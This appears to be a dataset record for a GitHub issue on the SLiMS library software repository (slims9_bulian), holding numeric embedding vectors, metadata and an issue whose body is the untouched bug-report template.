-0.022497449070215225, 0.02004431001842022, -0.027248462662100792, 0.0027384315617382526, 0.019780365750193596, 0.0013100221985951066, 0.01731170155107975, 0.008345326408743858, 0.009828077629208565, 0.0017078807577490807, 0.010115312412381172, -0.006796589121222496, 0.0006516147404909134, 0.03661075234413147, -0.024795323610305786, 0.0011615530820563436, -0.009439922869205475, 0.02391033060848713, 0.012801342643797398, -0.016349077224731445, 0.006175541784614325, 0.005212917923927307, 0.00626481743529439, -0.018973004072904587, 0.016054078936576843, -0.018227746710181236, 0.009191503748297691, -0.012436477467417717, -0.015176850371062756, -0.0005526352906599641, 0.0006268699071370065, 0.02304086461663246, 0.0019912337884306908, 0.007658293005079031, 0.022606130689382553, -0.0011081817792728543, -0.015914343297481537, -0.0007700019632466137, -0.0028607004787772894, 0.009820315055549145, -0.011481616646051407, -0.0017942452104762197, -0.00978926196694374, -0.00017685300554148853, 0.007619477342814207, -0.004242531023919582, -0.014936193823814392, 0.005395350977778435, -0.02228008210659027, -0.00888874288648367, -0.0046539753675460815, -0.005977582652121782, 0.0027209646068513393, -0.019795890897512436, 0.0043123988434672356, 0.020556675270199776, 0.004685027524828911, 0.012358847074210644, 0.003407998476177454, 0.0023425137624144554, -0.01769985631108284, -0.023180600255727768, -0.010821754112839699, 0.011318592354655266, -0.011264250613749027, -0.0011285599321126938, -0.002049457048997283, 0.01441606692969799, -0.02046351693570614, -0.00008224028715630993, -0.032946571707725525, -0.036051809787750244, 0.005313838366419077, 0.013360286131501198, -0.005247851833701134, 0.006361856125295162, -0.016644075512886047, 0.009641763754189014, 0.0008607330964878201, -0.014462645165622234, 0.00035079484223388135, -0.00403680931776762, -0.007002311293035746, -0.024515852332115173, 0.013236076571047306, 0.006707313936203718, -0.0007146899006329477, -0.006167778745293617, -0.0238016489893198, 0.014881852082908154, 0.000019392573449295014, -0.004615159705281258, -0.004335688427090645, 0.02734161913394928, -0.0011450564488768578, -0.009533080272376537, -0.01619381457567215, -0.027916088700294495, -0.015526189468801022, -0.012032796628773212, 0.011854245327413082, 0.005570020526647568, -0.011147803626954556, -0.008042566478252411, 0.0014711064286530018, 0.009113873355090618, 0.0292513407766819, 0.02957739122211933, 0.002449256367981434, 0.009044005535542965, 0.002305639209225774, 0.0070411269553005695, 0.005857254844158888, 0.0012712067691609263, -0.01116332970559597, -0.0026103404816240072, 0.02460901066660881, 0.021798769012093544, -0.015145797282457352, 0.011287539266049862, -0.011970692314207554, -0.026006367057561874, 0.01738933101296425, -0.011085699312388897, 0.0022532381117343903, 0.01728064939379692, -0.01328265480697155, 0.02002878487110138, 0.018662478774785995, -0.015689214691519737, 0.0006724780541844666, -0.025276636704802513, 0.02926686592400074, 0.026642940938472748, 0.007518556900322437, 0.011652405373752117, 0.025183478370308876, -0.00442496407777071, 0.01729617454111576, 0.0010421954793855548, 0.0021581402979791164, -0.006420079153031111, -0.005581664852797985, -0.00888098031282425, 0.018662478774785995, -0.005166339688003063, 0.013468969613313675, -0.02650320529937744, 0.004727724473923445, 0.0026083998382091522, -0.009556369855999947, -0.005915477871894836, 0.007161454763263464, -0.0192524753510952, -0.019780365750193596, -0.004642330575734377, -0.011279776692390442, -0.005484626162797213, -0.012102664448320866, -0.007623359095305204, 0.015254480764269829, 0.012514108791947365, -0.01957852393388748, -0.009874656796455383, 0.012855684384703636, -0.02737267129123211, 0.02075851522386074, -0.006998430006206036, -0.008205590769648552, -0.01585223898291588, -0.010813990607857704, 0.014322909526526928, -0.01957852393388748, 0.007169217802584171, -0.030136333778500557, 0.018351955339312553, 0.008710192516446114, 0.002538532018661499, -0.012778053991496563, -0.024904007092118263, -0.0037573378067463636, 0.0009965872159227729, -0.016721704974770546, 0.014703300781548023, 0.009665052406489849, 0.019873522222042084, 0.007712634280323982, 0.01519237644970417, 0.0007093527819961309, -0.01768432930111885, -0.0033090191427618265, -0.0013410745887085795, -0.0035574380308389664, 0.0020436346530914307, 0.017622224986553192, -0.042200181633234024, -0.0153709277510643, 0.015091455541551113, -0.012622792273759842, -0.021022459492087364, -0.006074621342122555, 0.030260542407631874, -0.001112063298933208, 0.024034541100263596, -0.006761655211448669, 0.0025443541817367077, -0.009874656796455383, 0.0021756072528660297, 0.010340441949665546, 0.03592760115861893, 0.013903702609241009, 0.018010379746556282, 0.001416764804162085, -0.020649831742048264, -0.019174844026565552, 0.011924113146960735, 0.012878973968327045, -0.013585415668785572, 0.00961071066558361, -0.011147803626954556, 0.0077165160328149796, 0.01151266973465681, 0.0015904640313237906, 0.015254480764269829, 0.02271481417119503, -0.016861440613865852, -0.015471847727894783, 0.0024647824466228485, -0.009866893291473389, -0.02120877429842949, -0.01729617454111576, -0.011745561845600605, 0.005919359624385834, 0.0005657355068251491, -0.004238649737089872, -0.01193963922560215, 0.001840823795646429, -0.020292729139328003, 0.004161018878221512, -0.024189801886677742, -0.01774643361568451, 0.010837280191481113, -0.005655414424836636, 0.018724584951996803, -0.0034448732621967793, 0.010829516686499119, 0.009284661151468754, 0.011458327993750572, 0.019500894472002983, -0.014322909526526928, 0.017637750133872032, 0.013236076571047306, 0.01766880415380001, 0.004972262308001518, -0.01193963922560215, -0.006385145243257284, 0.008958611637353897, 0.002478367881849408, 0.01287121046334505, -0.0026685637421905994, -0.0003983437782153487, 0.006191067863255739, 0.010736360214650631, -0.013080814853310585, 0.015464084222912788, -0.012630554847419262, -0.025711368769407272, -0.006206593941897154, 0.026860307902097702, 0.004405556246638298, 0.005608835723251104, 0.007110994774848223, 0.005414758343249559, -0.00825993251055479, -0.026456626132130623, -0.0011780495988205075, -0.008027039468288422, 0.007964935153722763, 0.004417201038450003, -0.020121941342949867, 0.009082820266485214, -0.04580225795507431, -0.006260935682803392, -0.009851367212831974, -0.00024732734891586006, 0.008585982955992222, -0.01887984573841095, 0.007662174291908741, 0.015425268560647964, -0.013577652163803577, 0.0014002681709825993, 0.0257424209266901, 0.009106109850108624, -0.02033930830657482, 0.016395656391978264, 0.00424641277641058, -0.010604387149214745, 0.01732722669839859, 0.022512974217534065, 0.01424527820199728, -0.013895939104259014, 0.014586854726076126, 0.03748022019863129, -0.0013119629584252834, 0.022078240290284157, -0.007592306472361088, -0.010107548907399178, -0.002561821136623621, -0.0008311363053508103, -0.018274324014782906, -0.0014410244766622782, -0.0077592129819095135, -0.007456452585756779, 0.006260935682803392, -0.007801909931004047, 0.003592371940612793, 0.012979893945157528, -0.007774739060550928, 0.030990272760391235, -0.005333246197551489, 0.0010101726511493325, 0.005096471402794123, -0.0007340976153500378, -0.014680012129247189, -0.01620934158563614, 0.03150263801217079, -0.0003954326384700835, -0.0010586919961497188, -0.03502708300948143, -0.020215097814798355, -0.013678573071956635, -0.006420079153031111, 0.015223428606987, -0.008422957733273506, -0.015464084222912788, 0.02114666998386383, -0.014493697322905064, -0.0015681451186537743, -0.010868332348763943, -0.00015307852299883962, 0.004622922744601965, 0.02611505053937435, -0.04241754859685898, 0.006750010885298252, -0.022124819457530975, 0.000006387116627593059, 0.026813728734850883, 0.011419512331485748, 0.0009053709218278527, -0.012824632227420807, -0.01426080521196127, -0.015339874662458897, 0.0010722774313762784, -0.010286100208759308, -0.0010392842814326286, 0.0040251645259559155, -0.01249858271330595, -0.001315844594500959, -0.001932040206156671, 0.006385145243257284, 0.000032477633794769645, -0.012250163592398167, 0.023972436785697937, -0.003922303672879934, 0.0009165303781628609, -0.0020533385686576366, -0.005298312287777662, -0.002621985273435712, -0.009913471527397633, -0.010744122788310051, 0.022885603830218315, 0.03651759773492813, 0.00616001570597291, 0.02541637234389782, 0.024376116693019867, 0.018615901470184326, 0.027217410504817963, -0.018724584951996803, -0.019842470064759254, 0.0063735004514455795, 0.011893060989677906, -0.022078240290284157, -0.00001670884739723988, 0.006357974372804165, -0.0008078470127657056, 0.015673687681555748, 0.017870644107460976, -0.0017476666253060102, 0.005438047926872969, -0.021752191707491875, -0.004572462756186724, -0.04005756974220276, 0.010868332348763943, -0.0033924723975360394, -0.007437044754624367, 0.00984360370784998, -0.00015319981321226805, -0.0021464957389980555, -0.019795890897512436, 0.014509223401546478, -0.01650433987379074, 0.015394216403365135, 0.027465829625725746, 0.012436477467417717, -0.0007365235942415893, -0.006451131775975227, -0.003407998476177454, -0.0029053380712866783, -0.012979893945157528, 0.004106677137315273, -0.007910593412816525, 0.011287539266049862, -0.019190369173884392, 0.014555802568793297, -0.011233197525143623, -0.01330594439059496, 0.005236207507550716, 0.0090672941878438, 0.032077107578516006, -0.011877534911036491, 0.01846063882112503, 0.0030101400334388018, -0.01881774142384529, -0.0018136529251933098, -0.009323476813733578, -0.0002474486536812037, 0.001653539133258164, -0.003994112368673086, 0.010107548907399178, 0.004972262308001518, 0.002682149177417159, 0.0010179358068853617, -0.004467661026865244, -0.00999110285192728, -0.0008626739145256579, 0.0026045183185487986, -0.022963233292102814, 0.016783811151981354, -0.006486065685749054, -0.023755069822072983, 0.009897945448756218, -0.0014827511040493846, 0.008353089913725853, -0.0015341815305873752, -0.004774303175508976, 0.00019237918604630977, 0.003827205626294017, 0.0035263856407254934, -0.009773735888302326, 0.0048480527475476265, 0.003953355830162764, 0.007631122134625912, 0.001819475321099162, -0.002649156143888831, -0.002255178987979889, -0.006532643921673298, 0.002082450082525611, 0.00047912850277498364, 0.0026879715733230114, -0.0037883901968598366, 0.007782502565532923, 0.01690801978111267, 0.026798201724886894, 0.012459767051041126, 0.005127524025738239, -0.0037398708518594503, -0.007852369919419289, -0.020525621250271797, 0.013003183528780937, 0.001773867174051702, 0.009719394147396088, -0.02654978446662426, 0.004494831897318363, -0.003375005442649126, 0.017575645819306374, 0.0061949496157467365, -0.01929905265569687, -0.007720397785305977, 0.0020572200883179903, 0.009820315055549145, -0.008275458589196205, 0.009315713308751583, 0.004661738406866789, -0.0016855619614943862, -0.00846177339553833, 0.012335557490587234, -0.011768851429224014, 0.020882723852992058, -0.014392777346074581, 0.018693530932068825, 0.0038213832303881645, -0.02732609212398529, -0.004615159705281258, -0.011419512331485748, 0.018740110099315643, -0.01777748577296734, 0.016395656391978264, 0.004688909277319908, -0.014439355581998825, 0.009315713308751583, 0.0004405556246638298, 0.012048322707414627, 0.01881774142384529, 0.009765973314642906, -0.0008112433715723455, 0.025897683575749397, 0.01558829378336668, -0.02123982645571232, -0.009432160295546055, -0.0018883728189393878, -0.025230057537555695, -0.02113114297389984, -0.002204718766734004, 0.006998430006206036, -0.010922674089670181, 0.018724584951996803, -0.010876095853745937, 0.0012081315508112311, 0.01229674182832241, -0.02159692905843258, -0.011489380151033401, -0.016240393742918968, 0.014253041706979275, -0.009595184586942196, -0.0024104409385472536, -0.028319768607616425, 0.008314274251461029, 0.011869771406054497, -0.009750447236001492, -0.017078807577490807, -0.015526189468801022, 0.0021367918234318495, -0.009571895934641361, 0.004782066214829683, -0.0022512974683195353, 0.01732722669839859, -0.024546904489398003, 0.01270818617194891, 0.03425077348947525, -0.009354528971016407, -0.014431593008339405, -0.004452134948223829, 0.02425190806388855, 0.0009543754276819527, 0.016349077224731445, -0.004339569713920355, 0.004716080147773027, 0.0013342818710952997, -0.002377447672188282, 0.025152426213026047, 0.006381263956427574, 0.006878101732581854, 0.0223111342638731, 0.007037245202809572, -0.008500589057803154, -0.011450564488768578, 0.008710192516446114, -0.0223111342638731, -0.007006193045526743, 0.024857429787516594, 0.012094900943338871, 0.00846177339553833, 0.02083614654839039, 0.0196251031011343, -0.03931231051683426, 0.005601072683930397, -0.000029748420274700038, -0.014128832146525383, 0.01310410350561142, -0.015603819862008095, -0.002633629832416773, 0.0014536394737660885, -0.009905708953738213, 0.002691853092983365, 0.02923581376671791, -0.01928352750837803, -0.021721139550209045, 0.01926800049841404, 0.004149374086409807, 0.001742814783938229, 0.0023522176779806614, -0.01501382514834404, 0.05996214225888252, -0.008011513389647007, -0.014501460827887058, -0.022776920348405838, -0.019190369173884392, 0.005364298354834318, 0.0077165160328149796, 0.010076496750116348, -0.01844511367380619, 0.0138804130256176, 0.013197260908782482, 0.0033808276057243347, -0.015875527635216713, -0.0020261676982045174, -0.015448558144271374, 0.008717955090105534, 0.00009309648885391653, -0.02313402108848095, -0.01022399589419365, 0.007079942151904106, 0.000445164943812415, 0.006152252666652203, -0.02158140391111374, 0.004739369265735149, -0.010286100208759308, -0.005356535315513611, 0.010891621932387352, -0.025928735733032227, 0.0002465995494276285, 0.02232665941119194, -0.009082820266485214, -0.0067150769755244255, -0.018025904893875122, -0.027605565264821053, 0.016457760706543922, 0.014043438248336315, -0.00007205122528830543, 0.007417636923491955, -0.006575341336429119, -0.004032927565276623, 0.015277770347893238, 0.010992541909217834, 0.009408870711922646, -0.009090583771467209, -0.017466962337493896, -0.003539971075952053, -0.020510096102952957, -0.01405896432697773, 0.017544593662023544, 0.0026996161323040724, -0.003530267160385847, 0.00040465130587108433, -0.004556936677545309, 0.013919228687882423, -0.00009424881864106283, 0.010464651510119438, -0.008741244673728943, 0.0020766279194504023, -0.014229752123355865, 0.006319159176200628, 0.01193963922560215, 0.002499716356396675, -0.00924584548920393, -0.008554929867386818, 0.01889537274837494, -0.023692965507507324, 0.0007064415840432048, -0.008997426368296146, 0.0065442887134850025, 0.007002311293035746, 0.006598630454391241, -0.012203584425151348, -0.007332243025302887, -0.005189628805965185, 0.01077517494559288, 0.007875659503042698, 0.008120196871459484, 0.02577347494661808, -0.0031362902373075485, 0.000632692186627537, -0.005632125306874514, -0.02460901066660881, 0.019764838740229607, -0.0023929739836603403, 0.021752191707491875, -0.022544026374816895, -0.00021518327412195504, 0.01292555220425129, 0.011140041053295135, 0.003113000886514783, 0.0038796064909547567, -0.004067861475050449, 0.007817436009645462, 0.01331370696425438, 0.029391076415777206, -0.00012026731565129012, 0.0012983775231987238, -0.01459461823105812, -0.0099988654255867, 0.009734920226037502, 0.011248724535107613, 0.022000610828399658, 0.013888176530599594, 0.02156587690114975, -0.0055467309430241585, -0.00577186094596982, -0.0006618038169108331, -0.019438788294792175, -0.020867198705673218, 0.008213354274630547, 0.0069091543555259705, -0.020215097814798355, -0.005337127484381199, -0.01731170155107975, -0.025959787890315056, 0.001976677915081382, 0.004106677137315273, -0.009020715951919556, 0.00009073116962099448, -0.016054078936576843, -0.006012516561895609, 0.013445680029690266, 0.0017282589105889201, -0.01808801107108593, 0.03344340994954109, -0.006769418716430664, -0.0018282087985426188, -0.0014895438216626644, -0.007964935153722763, -0.02158140391111374, 0.001677798805758357, -0.013220550492405891, 0.0099988654255867, 0.0026355707086622715, 0.009385581128299236, 0.0025948144029825926, 0.023258231580257416, -0.0053681801073253155, 0.000624443928245455, 0.006416197866201401, -0.02892529033124447, -0.01889537274837494, 0.00014725619985256344, -0.01929905265569687, -0.011683457531034946, -0.0028801080770790577, 0.015355400741100311, 0.019050633534789085, -0.008950848132371902, 0.01152043230831623, -0.013810545206069946, -0.02383270114660263, 0.026347942650318146, 0.013942518271505833, -0.0019592109601944685, -0.0015729970764368773, 0.004956735763698816, 0.006004753522574902, 0.008904269896447659, 0.008958611637353897, 0.032077107578516006, -0.00014834788453299552, -0.006423960905522108, -0.008570456877350807, 0.02162798121571541, -0.005449692253023386, -0.0030237252358347178, -0.008034802973270416, -0.01384936086833477, 0.0029635613318532705, -0.010883858427405357, 0.00032047025160863996, 0.0040251645259559155, -0.010208469815552235, -0.02847503125667572, -0.020246149972081184, 0.03122316673398018, 0.02622373402118683, -0.011652405373752117, 0.004646212328225374, -0.005441929213702679, -0.0038582580164074898, -0.017203018069267273, 0.008422957733273506, 0.00567094050347805, -0.012063848786056042, -0.012250163592398167, -0.00432404363527894, -0.027263987809419632, 0.016302498057484627, -0.006385145243257284, 0.012102664448320866, 0.006315277423709631, 0.020510096102952957, -0.002592873526737094, 0.010829516686499119, 0.010262810625135899, 0.004972262308001518, 0.004595751874148846, -0.007770857773721218, 0.007825199514627457, -0.02929791994392872, 0.0060202800668776035, 0.00888874288648367, 0.001454609795473516, -0.013725151307880878, -0.008787822909653187, -0.023599807173013687, 0.0005841728416271508, 0.021814296022057533, 0.011388460174202919, 0.0017020584782585502, 0.012343320064246655, 0.015215665102005005, 0.011403986252844334, -0.0046578566543757915, 0.0003670488076750189, -0.005841728765517473, -0.0036040167324244976, -0.009983339346945286, -0.025167953222990036, -0.02158140391111374, 0.00442496407777071, -0.014462645165622234, -0.004541410133242607, 0.01920589618384838, 0.016395656391978264, -0.020090889185667038, -0.006944088265299797, -0.014097779989242554, -0.004083387553691864, 0.008422957733273506, -0.0011062410194426775, -0.007363295182585716, 0.012653844431042671, -0.0068703386932611465, -0.031052378937602043, -0.00481700012460351, 0.006420079153031111, -0.008135722950100899, 0.02464006282389164, 0.01061991322785616, 0.005150813143700361, 0.020975882187485695, 0.014291857369244099, 0.025959787890315056, 0.00867137685418129, -0.006788826081901789, 0.026394521817564964, 0.016395656391978264, 0.005014959257096052, 0.004770421423017979, 0.0022280081175267696, -0.0022318896371871233, -0.0012517990544438362, -0.01095372624695301, 0.02546294964849949, 0.0074292817153036594, 0.0039824675768613815, 0.013127393089234829, -0.0017981268465518951, 0.002103798557072878, 0.00393588887527585, -0.007491386495530605, -0.00644336873665452, -0.016007501631975174, 0.0009398196125403047, 0.004980025347322226, 0.01881774142384529, 0.01651986502110958, 0.0037359893321990967, -0.01112451497465372, 0.008360852487385273, -0.018709057942032814, -0.010821754112839699, 0.003679706947878003, 0.013942518271505833, -0.0029519167728722095, -0.0008437513606622815, -0.005294430535286665, -0.002802477218210697, 0.02117772214114666, -0.00132748915348202, -0.0047005536034703255, 0.017249595373868942, -0.0052051548846066, -0.026083998382091522, -0.022419817745685577, 0.012801342643797398, -0.019190369173884392, -0.008663613349199295, 0.007471978664398193, 0.003968881908804178, 0.009051768109202385, -0.0027190239634364843, 0.0017583409789949656, 0.00016399536980316043, 0.006233764812350273, -0.01846063882112503, -0.0011392341693863273, -0.006742247845977545, -0.019795890897512436, 0.005449692253023386, -0.014478171244263649, -0.0003883973404299468, 0.005111997947096825, -0.0247021671384573, 0.007394347805529833, -0.026673993095755577, -0.01172227319329977, -0.013173971325159073, -0.001855379668995738, -0.0055040339939296246, 0.006489946972578764, -0.019035108387470245, 0.010286100208759308, -0.0169390719383955, -0.006874220445752144, -0.005209036637097597, 0.021037986502051353, -0.00926913507282734, 0.009727157652378082, 0.006548170465976, -0.013903702609241009, -0.013422390446066856, -0.002072746166959405, 0.015417505986988544, 0.0013808604562655091, 0.013166208751499653, -0.011287539266049862, -0.013406864367425442, 0.00999110285192728, -0.011046883650124073, -0.025121374055743217, -0.020603252574801445, -0.010674254968762398, 0.0007738834829069674, 0.011846482753753662, -0.005942648742347956, -0.014850799925625324, -0.00040222532697953284, -0.020137468352913857, -0.0021076800767332315, 0.002375507028773427, 0.007479741703718901, -0.00808138120919466, -0.005973701365292072, -0.014439355581998825, 0.008811112493276596, 0.0007700019632466137, 0.032542891800403595, -0.008058092556893826, 0.008578219451010227, -0.003192572621628642, -0.024515852332115173, 0.009486502036452293, -0.018584849312901497, 0.00530995661392808, 0.008306511677801609, 0.01291778963059187, -0.03310183435678482, -0.007145928684622049, 0.008151249028742313, -0.0017156439134851098, 0.007262375205755234, -0.01077517494559288, 0.008422957733273506, 0.005663177464157343, 0.013624231331050396, 0.019407736137509346, 0.0018447053153067827, 0.005069300998002291, -0.012878973968327045, 0.001570085878483951, 0.003675825195387006, 0.015828950330615044, -0.0020649831276386976, -0.001325548393651843, 0.007949409075081348, 0.017622224986553192, 0.012615028768777847, 0.006319159176200628, -0.0009165303781628609, -0.0392502062022686, 0.0004941694787703454, -0.028956342488527298, -0.004032927565276623, -0.001601138268597424, 0.01655091717839241, 0.024050066247582436, 0.012125954031944275, 0.003650595201179385, 0.009044005535542965, 0.00846953596919775, -0.005962056573480368, 0.0051779840141534805, 0.011310828849673271, 0.0009936761343851686, 0.008027039468288422, 0.012125954031944275, -0.021053513512015343, -0.013391338288784027, 0.05247851833701134, 0.007246848661452532, 0.016069605946540833, 0.023599807173013687, -0.00043230733717791736, 0.015394216403365135, -0.008034802973270416, 0.0024220854975283146, -0.02265270985662937, -0.01732722669839859, -0.006602511741220951, -0.013748440891504288, -0.009719394147396088, -0.02308744378387928, -0.006990666501224041, 0.00489463098347187, 0.008787822909653187, 0.017109859734773636, -0.0052167996764183044, -0.015316586010158062, 0.00673060305416584, -0.007188625633716583, 0.01420646347105503, -0.023677438497543335, 0.010433599352836609, 0.02274586632847786, 0.01810353621840477, 0.007437044754624367, -0.002662741346284747, -0.010006628930568695, 0.017140913754701614, 0.004362859297543764, 0.0032721443567425013, 0.005123642273247242, -0.00421924190595746, 0.015960922464728355, -0.006885864771902561, 0.022217975929379463, 0.00026176185929216444, 0.004820881877094507, -0.0077592129819095135, 0.0018058898858726025, 0.0023813291918486357, -0.0015584412030875683, 0.018631426617503166, 0.0014536394737660885, 0.0031052378471940756, 0.0076078325510025024, 0.027201883494853973, -0.00867913942784071, 0.002785010263323784, 0.008764534257352352, 0.009090583771467209, 0.019143791869282722, -0.0074331630021333694, 0.015456321649253368, 0.000872377771884203, -0.0041571371257305145, -0.00722355954349041, -0.009758209809660912, 0.0025133017916232347, -0.01692354679107666, -0.012739238329231739, 0.009564132429659367, -0.020711936056613922, 0.00390677759423852, 0.007530201692134142, 0.03729390725493431, -0.01846063882112503, 0.029623968526721, -0.015176850371062756, -0.010674254968762398, -0.014004622586071491, 0.008694665506482124, -0.007274019531905651, -0.017855117097496986, 0.003538030432537198, -0.017513541504740715, 0.003338130656629801, 0.0104103097692132, 0.018383007496595383, -0.006455013062804937, 0.032542891800403595, -0.003590431297197938, -0.017109859734773636, -0.03502708300948143, -0.013166208751499653, 0.003671943675726652, 0.006746129132807255, 0.03468550741672516, 0.007537964731454849, 0.012801342643797398, 0.005162457935512066, -0.005290548782795668, -0.004164900165051222, 0.010728596709668636, -0.005224562715739012, -0.005977582652121782, 0.0011343822116032243, 0.0031945134978741407, 0.019035108387470245, 0.011396222747862339, -0.02151929773390293, 0.002909219590947032, 0.009075057692825794, -0.000533227575942874, -0.013919228687882423, -0.009750447236001492, 0.007378821261227131, -0.002490012673661113, 0.008112434297800064, 0.004013519734144211, 0.009137162007391453, 0.011318592354655266, 0.0008913003257475793, 0.0024531378876417875, -0.008927558548748493, 0.0015953159891068935, 0.005057656206190586, -0.010146364569664001, -0.006051332224160433, 0.008593745529651642, 0.0177619606256485, 0.006967377383261919, 0.014501460827887058, -0.01424527820199728, 0.012591739185154438, 0.018320903182029724, 0.009657289832830429, 0.039063893258571625, 0.001713703153654933, 0.0007098379428498447, -0.006691787391901016, -0.014579091221094131, 0.00730119040235877, 0.02968607470393181, -0.013973570428788662, 0.042138077318668365, 0.014951719902455807, 0.0004177515220362693, 0.010503467172384262, 0.034809716045856476, -0.015665924176573753, -0.003734048455953598, -0.01348449569195509, 0.010324915871024132, -0.00662968261167407, -0.014004622586071491, -0.03007422760128975, -0.03198394924402237, 0.018212219700217247, 0.017451437190175056, 0.004692790564149618, 0.006470539141446352, -0.011326354928314686, -0.011303065344691277, 0.020929303020238876, 0.015572767704725266, 0.013624231331050396, -0.0038291465025395155, -0.006008635275065899, 0.005243970546871424, 0.008601509034633636, 0.016799336299300194, 0.011054647155106068, 0.014284093864262104, 0.021301930770277977, -0.014866326004266739, -0.002191133564338088, 0.0043085175566375256, 0.003712699981406331, -0.02381717413663864, 0.0000050945309340022504, -0.010899384506046772, 0.012599502690136433, -0.010511229746043682, 0.015464084222912788, -0.0032934928312897682, 0.006963496096432209, 0.005744690075516701, 0.012646080926060677, -0.0012983775231987238, -0.009540842846035957, -0.006633564364165068, 0.013290418311953545, 0.017637750133872032, -0.007029482163488865, -0.012607265263795853, -0.008353089913725853, -0.0017864821711555123, -0.009408870711922646, -0.023739542812108994, 0.007440926041454077, 0.013942518271505833, -0.005942648742347956, 0.002621985273435712, 0.005150813143700361, 0.01022399589419365, 0.04067861661314964, 0.009175977669656277, 0.0006986784865148365, -0.023599807173013687, 0.004032927565276623, 0.0023211652878671885 ]
null
null
null
null
null
null
null
null
null
[ "slims", "slims9_bulian" ]
**Describe the bug** A clear and concise description of what the bug is. **To Reproduce** Steps to reproduce the behavior: 1. Go to '...' 2. Click on '....' 3. Scroll down to '....' 4. See error **Expected behavior** A clear and concise description of what you expected to happen. **Screenshots** If applicable, add screenshots to help explain your problem. **Desktop (please complete the following information):** - OS: [e.g. iOS] - Browser [e.g. chrome, safari] - Version [e.g. 22] **Smartphone (please complete the following information):** - Device: [e.g. iPhone6] - OS: [e.g. iOS8.1] - Browser [e.g. stock browser, safari] - Version [e.g. 22] **Additional context** Add any other context about the problem here.
Bulian9 Portable: showing following error how to solve it: All GMD/Media
https://api.github.com/repos/slims/slims9_bulian/issues/157/comments
1
2022-08-11T13:50:16
2022-11-12T02:43:23Z
https://github.com/slims/slims9_bulian/issues/157
1,335,991,587
157
false
This is a GitHub Issue repo:slims9_bulian owner:slims Title : Bulian9 Portable: showing following error how to solve it: All GMD/Media Issue date: --- start body --- **Describe the bug** A clear and concise description of what the bug is. **To Reproduce** Steps to reproduce the behavior: 1. Go to '...' 2. Click on '....' 3. Scroll down to '....' 4. See error **Expected behavior** A clear and concise description of what you expected to happen. **Screenshots** If applicable, add screenshots to help explain your problem. **Desktop (please complete the following information):** - OS: [e.g. iOS] - Browser [e.g. chrome, safari] - Version [e.g. 22] **Smartphone (please complete the following information):** - Device: [e.g. iPhone6] - OS: [e.g. iOS8.1] - Browser [e.g. stock browser, safari] - Version [e.g. 22] **Additional context** Add any other context about the problem here. --- end body ---
944
[ -0.018829138949513435, 0.010632720775902271, -0.010667525231838226, -0.010067150928080082, 0.04392305761575699, -0.019734051078557968, 0.0020839087665081024, 0.049143705517053604, -0.0061777676455676556, 0.04075586423277855, -0.019890671595931053, -0.01531390193849802, -0.008970814757049084, 0.023719146847724915, -0.012172812595963478, -0.0056774551048874855, -0.05015303194522858, -0.0073350113816559315, -0.014461196027696133, 0.028922392055392265, -0.0024819832760840654, -0.00028332893270999193, 0.00472033629193902, 0.05506043881177902, -0.019925475120544434, 0.020969605073332787, -0.0312194786965847, -0.0022470541298389435, 0.012947208248078823, -0.010563111864030361, -0.0008494430221617222, -0.003615299006924033, -0.006878204643726349, 0.027843458577990532, 0.014252370223402977, -0.011781263165175915, 0.04757751151919365, 0.06055952236056328, -0.021178431808948517, 0.030958445742726326, -0.016941005364060402, 0.0026734070852398872, 0.0018152629490941763, 0.021509071812033653, -0.0484476201236248, -0.006273479200899601, -0.00857926532626152, -0.003937239293009043, -0.04141714423894882, 0.0011605066247284412, -0.01822006329894066, -0.015601038001477718, -0.010841546580195427, -0.05011822655797005, -0.014991962350904942, -0.022692419588565826, 0.07047875225543976, 0.029844706878066063, -0.027338795363903046, -0.014496000483632088, -0.01345187146216631, -0.052519723773002625, 0.02352772280573845, -0.0028996351175010204, -0.023719146847724915, 0.06745077669620514, 0.006138612516224384, 0.02718217670917511, -0.0063648405484855175, 0.016088299453258514, 0.01648854836821556, 0.008962113410234451, 0.028957197442650795, 0.026399079710245132, 0.03358617052435875, -0.014739630743861198, 0.018167857080698013, 0.012303328141570091, -0.03231581300497055, -0.02662530727684498, -0.049039293080568314, -0.022866440936923027, -0.0535290502011776, -0.01870732381939888, -0.005742713343352079, 0.024345625191926956, -0.026590503752231598, -0.09063045680522919, -0.02690374292433262, 0.015252994373440742, 0.022483592852950096, 0.018550705164670944, 0.008292130194604397, -0.019681844860315323, 0.05053587630391121, 0.008679328486323357, -0.014852745458483696, 0.010824144817888737, -0.023005658760666847, -0.02391057088971138, -0.021108822897076607, -0.04343579709529877, -0.006543213035911322, -0.03786710277199745, 0.01915978081524372, 0.009431971237063408, 0.03807593137025833, -0.06118600070476532, 0.01133750844746828, 0.08165094256401062, 0.026120644062757492, -0.0036979594733566046, -0.0190205629914999, -0.015183386392891407, 0.007274103816598654, 0.02686893753707409, -0.010711031034588814, -0.008466151542961597, -0.012372937053442001, -0.0025276639498770237, -0.02518092840909958, -0.039085254073143005, -0.032054781913757324, 0.0032737816218286753, -0.0502922460436821, 0.02763463370501995, 0.02345811389386654, 0.006382242776453495, 0.018759530037641525, -0.013547582551836967, -0.007909282110631466, 0.000493786355946213, -0.008714132942259312, -0.022448789328336716, -0.002242703689262271, -0.03818034380674362, -0.018898747861385345, 0.03160232678055763, -0.012503453530371189, -0.01888134516775608, -0.05398150533437729, -0.03995536267757416, 0.03783230111002922, -0.021822310984134674, -0.042600493878126144, -0.017854617908596992, 0.002368869259953499, -0.021039213985204697, -0.023092668503522873, 0.026277264580130577, -0.04333138465881348, -0.05537367984652519, 0.032368019223213196, 0.03186335787177086, 0.034717313945293427, -0.03316852077841759, 0.004433200694620609, -0.0011191765079274774, -0.006899957079440355, -0.015461821109056473, -0.03325553238391876, -0.001393260550685227, 0.023249289020895958, -0.02401498332619667, 0.009962737560272217, 0.00863582268357277, 0.005525186192244291, 0.02274462580680847, 0.0064387996681034565, 0.030714815482497215, -0.01990807242691517, 0.02518092840909958, -0.036370519548654556, -0.00558174354955554, -0.04409707710146904, 0.00010257758549414575, 0.026242459192872047, 0.03302930295467377, -0.008418295532464981, -0.0017576183890923858, -0.026677513495087624, -0.02070857211947441, 0.016540754586458206, -0.004602871835231781, 0.013425767421722412, -0.02163088694214821, 0.011198291555047035, -0.013042920269072056, -0.021387256681919098, -0.002810449106618762, 0.004898708313703537, -0.011563736945390701, 0.015548831783235073, -0.056208983063697815, 0.045767687261104584, 0.003552216337993741, -0.002041491214185953, -0.028000079095363617, 0.007743962109088898, 0.004702934063971043, 0.008622771129012108, 0.004187395330518484, -0.024885091930627823, 0.013913027942180634, -0.003656629240140319, 0.03616169095039368, -0.016253618523478508, 0.024798080325126648, 0.014696125872433186, -0.06146443635225296, 